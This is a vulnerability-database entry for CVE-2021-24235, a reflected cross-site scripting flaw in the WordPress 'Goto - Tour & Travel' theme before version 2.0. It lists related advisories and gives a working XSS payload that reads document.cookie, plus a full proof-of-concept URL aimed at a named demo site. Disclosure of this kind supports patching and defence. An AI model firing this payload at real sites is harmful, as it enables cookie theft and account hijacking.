Unauthenticated Reflected XSS attack via Goto - Tour & Travel < 2.
Reporter | Title | Published | Views | Family All 6 |
---|---|---|---|---|
![]() | CVE-2021-24235 Goto - Tour & Travel < 2.0 - Unauthenticated Reflected XSS | 22 Apr 202121:00 | – | cvelist |
![]() | WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting | 15 Jul 202111:03 | – | nuclei |
![]() | CVE-2021-24235 | 22 Apr 202121:15 | – | cve |
![]() | CVE-2021-24235 | 22 Apr 202121:15 | – | nvd |
![]() | Cross site scripting | 22 Apr 202121:15 | – | prion |
![]() | Goto - Tour & Travel < 2.0 - Unauthenticated Reflected XSS | 31 Mar 202100:00 | – | wpvulndb |
Payload: <input/Autofocus/%0D*/Onfocus=alert(`m0ze`);alert(document.cookie);//>
https://boostifythemes.com/demo/wp/goto/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3B%2F%2F%3E&start_date=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3B%2F%2F%3E&avaibility=13
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo